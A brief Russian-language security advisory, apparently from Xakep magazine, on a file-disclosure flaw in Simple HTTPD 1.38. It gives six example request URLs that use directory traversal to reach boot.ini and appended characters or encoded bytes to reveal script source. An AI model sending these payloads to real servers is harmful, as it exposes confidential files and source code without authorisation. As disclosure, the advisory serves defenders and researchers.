Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Simple HTTPD 1.38
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных при обработке строк, содержащих "..\",
'+', '.', %20, %2e последовательности. Атакующий может выгрузить произвольные
файлы, а также просмотреть содержимое сценариев и CGI программ на целевой
системе.
Пример:
http://SERVER/..\..\..\boot.ini
http://SERVER/..\%2e%2e%5c..\boot.ini
http://SERVER/file.php+
http://SERVER/file.php.
http://SERVER/file.php%80
http://SERVER/file.php%ff